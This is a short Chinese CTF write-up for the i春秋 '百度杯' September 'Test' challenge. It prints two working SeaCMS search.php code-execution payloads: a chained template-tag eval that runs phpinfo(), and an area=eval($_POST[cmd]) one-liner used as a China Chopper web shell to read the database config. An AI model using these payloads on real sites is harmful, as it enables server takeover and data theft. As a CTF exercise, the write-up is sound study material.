1. 程式人生 > >i春秋——“百度杯”CTF比賽 九月場——Test(海洋cms / seacms 任意代碼執行漏洞)

i春秋——“百度杯”CTF比賽 九月場——Test(海洋cms / seacms 任意代碼執行漏洞)

jpg com ctf比賽 ima 命令 () nbsp 上傳 菜刀

打開發現是海洋cms,那就搜索相關漏洞

技術分享圖片

找到一篇介紹海洋cms的命令執行漏洞的文章:https://www.jianshu.com/p/ebf156afda49

直接利用其中給出的poc

/search.php

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

技術分享圖片

可以執行系統命令

技術分享圖片

沒找到flag,考慮可能在數據庫中,想上傳一句話,然後用菜刀查數據庫來著,但是沒有寫文件的權限,手動查數據庫感覺太麻煩,所以換個exp

海洋cms v6.28命令執行漏洞 : https://www.uedbox.com/seacms-v628-0day/

/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

菜刀直接連接

找了好久終於找到數據庫配置文件

技術分享圖片

編輯該條shell配置如下

技術分享圖片

技術分享圖片

最後得到flag

技術分享圖片

i春秋——“百度杯”CTF比賽 九月場——Test(海洋cms / seacms 任意代碼執行漏洞)